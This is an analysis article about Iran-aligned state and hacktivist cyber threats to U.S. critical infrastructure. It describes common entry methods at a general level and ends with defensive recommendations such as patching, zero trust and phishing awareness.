In modern war, the declaration of a ceasefire might suspend soldiers' movement and quiet the cacophony of artillery, but it doesn't end the constant, hidden wars taking place in cyberspace.
Real-world truces do not carry over into the realm of bits and bytes, and amidst escalating geopolitical tensions, epitomized by CISA's latest alert of potential Iran-sponsored cyber operations, it is essential that we understand our cybersecurity landscape capabilities and limitations and ask ourselves: Is U.S. critical infrastructure prepared for an impending widespread cyberattack?
Unlike conventional warfare, cyber operations are unbound by geographical location or traditional rules of engagement. State-sponsored Advanced Persistent Threat (APT) groups (APTs 34 and 35) and their massive cadre of hacktivist proxies are consistently well-positioned for active engagement, exemplified by the latest Iran-Israel conflict. When kinetic attacks were confronted by global calls for restraint, the cyber space saw an unprecedented mobilization of nearly 100 hacktivist operations—more than 90 percent pro-Iranian - churning out a relentless series of disruption attacks.
This "hacktivist horde" is an influential force multiplier for psychological operations and low-sophistication disruption that creates a general condition of chaos against an adversary that is beyond the control capacity of traditional ceasefires. This behavior forces victim organizations to spend money on investigation and response, achieving a strategic objective of psychological exhaustion months following the cessation of physical violence.
The Forgotten Cracks in Our Online Armor
Although state actors present the most capable, dangerous threats, some of the most serious are often overlooked. Iran-aligned adversaries' tactics often attempt to exploit commonly disregarded attack surfaces within critical infrastructure networks.
The two most common first points of entry are:
- Exploitation of Public-Confronting Applications with Known Vulnerabilities: Adversaries systematically scan for and exploit systems not yet patched. The evidence inevitably leads to VPNs, Virtual Desktop Infrastructure (VDI), firewalls, and reverse proxies. Threats like CVE-2024-24919, CVE-2024-3400, and older well-documented CVEs are exploited automatically for initial penetration. These exploitations have nothing to do with zero-day attacks; this has to do with a problem with cyber hygiene and patching fundamentals.
- High-level Social Engineering: Spear-phishing is the most beloved method for nearly all top APT groups. These are highly targeted, socially crafted baits that often make use of fake login pages to capture credentials or make use of professional websites like LinkedIn to build credibility before sending a malicious link. Increased generational use of Generative AI to enhance the authenticity of the baits makes them even more convincing.
Upon gaining entry into a user’s network attackers rely heavily on Living off the Land Binaries (LOLBins) - utilizing native Windows tools like cmd.exe and PowerShell for command execution. This methodology allows attackers to remain mostly undetectable on normal administrative traffic monitoring, preventing cyberdefenders from easily tracking attackers’ movements.
The attackers’ motives are generally not just espionage but sabotage, employing wiper malware that is designed to permanently erase data and render systems inoperable.
U.S. Preparedness: A Doctrine of Proactive Defense
Is the U.S. prepared in the face of this omnipresent threat? The official U.S. cyber strategy, based on the "Persistent Engagement" and "Defend Forward" doctrines, is basically offensive. The role of U.S. Cyber Command (USCYBERCOM) is to counteract malicious activity at its source—operating outside friendly networks to deter attacks before they reach U.S. targets.
However, the resiliency of the nation's 16 critical infrastructure sectors does not rely exclusively on the government's offensive capabilities. The latest CISA notice, which specifically highlights the heightened risk to the Defense Industrial Base and entities with ties to Israeli businesses, is a clear signal that private sector organizations are in the lead.
Although the U.S. has not yet seen a coordinated, destructive attack from Iran, the threat environment continues to be volatile. Iran's cyber strategy, which effectively mixes high-level APT activity with a low-level hacktivist swarm, is to test defenses, gather intel, and sow discord. The Middle East attacks—embracing everything from wiper attacks on financial institutions to militarizing IoT cameras in civilian neighborhoods for intelligence collection—are a glimpse of what could be leveled against U.S. targets.
Reexamining the original question, “is U.S. critical infrastructure prepared for this wave of attacks?” the answer is no; this sector remains vulnerable. Organizations must harden defenses, close existing gaps, and elevate human readiness.
First, patch management should always be prioritized. Adopting a zero-trust security model within the organization will help cultivate the mindset that no device should be presumed safe.
Second, since many organizations rely on third-party vendors, strict risk assessments and more stringent security requirements must be applied to all external partners. This will allow for organizations to have transparency into all of their assets. After all, organizations cannot protect what they cannot see.
Lastly, cybersecurity awareness must be considered as a key component of day-to-day operations. Every employee should be equipped to identify phishing attempts and detect malicious, socially engineered campaigns. Although U.S. critical infrastructure is not currently well-positioned to defend against a widespread cyberattack, by understanding our capabilities and limitations now, we can meaningfully limit the effects of any future malicious cyber event.
